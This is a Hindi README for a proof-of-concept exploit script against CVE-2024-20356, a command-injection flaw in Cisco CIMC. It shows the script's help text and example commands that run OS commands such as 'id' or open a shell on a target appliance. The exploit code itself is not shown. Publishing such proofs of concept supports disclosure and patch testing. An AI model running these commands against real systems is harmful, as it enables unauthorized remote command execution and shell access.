
यह CVE-2024-20356 के लिए एक प्रूफ ऑफ कॉन्सेप्ट है, जो Cisco के CIMC में एक कमांड इंजेक्शन भेद्यता है।
यह CVE-2024-20356 के लिए एक प्रूफ ऑफ कॉन्सेप्ट है, जो Cisco के CIMC में एक कमांड इंजेक्शन भेद्यता है।
पूर्ण तकनीकी विवरण यहाँ पाए जा सकते हैं: https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom
Usage: CVE-2024-20356.py [-h] -t HOST -u USERNAME -p PASSWORD [-a ACTION] [-c CMD] [-v]
options:
-h, --help Show this help message and exit
-t HOST, --host HOST Target hostname or IP address (format 10.0.0.1 or 10.0.0.2:1337)
-u USERNAME, --username USERNAME
Username (default: admin)
-p PASSWORD, --password PASSWORD
Password (default: cisco)
-a ACTION, --action ACTION
Action: test, cmd, shell, dance (default: test)
-c CMD, --cmd CMD OS command to run (Default: NONE)
-v, --verbose Displays more information about cimc
उदाहरण कमांड:
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -v
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -c 'id'
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -a shell
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -a dance
पूर्ण उपयोग निर्देशों के लिए --help तर्क का उपयोग करें।
यह प्रूफ-ऑफ-कॉन्सेप्ट केवल प्रदर्शन उद्देश्यों के लिए है और इसका उपयोग अवैध गतिविधियों के लिए नहीं किया जाना चाहिए। इस कोड के उपयोग या दुरुपयोग से होने वाली किसी भी क्षति के लिए LRQA Nettitude जिम्मेदार नहीं है।